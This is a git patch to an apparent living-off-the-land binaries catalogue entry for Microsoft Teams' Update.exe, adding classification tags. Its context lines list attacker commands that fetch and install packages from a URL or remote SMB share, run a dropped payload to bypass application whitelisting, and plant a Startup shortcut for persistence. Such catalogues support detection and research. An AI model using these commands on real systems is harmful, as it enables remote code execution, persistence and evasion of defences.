From 927189f01e9b38a4996092c77900837ef638b5b7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:35:45 +0200 Subject: [PATCH] Update Update.yml Tags Added Tags: Execute Nuget Execute Remote Execute EXE --- yml/OtherMSBinaries/Update.yml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index f4049a4..c0b51ae 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -46,6 +58,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -53,6 +68,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass @@ -60,6 +78,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -67,6 +88,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -74,6 +98,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary @@ -81,6 +108,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary @@ -88,6 +117,8 @@ Commands: Privileges: User MitreID: T1547 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --removeShortcut=payload.exe -l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary @@ -95,6 +126,8 @@ Commands: Privileges: User MitreID: T1070 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe' Code_Sample: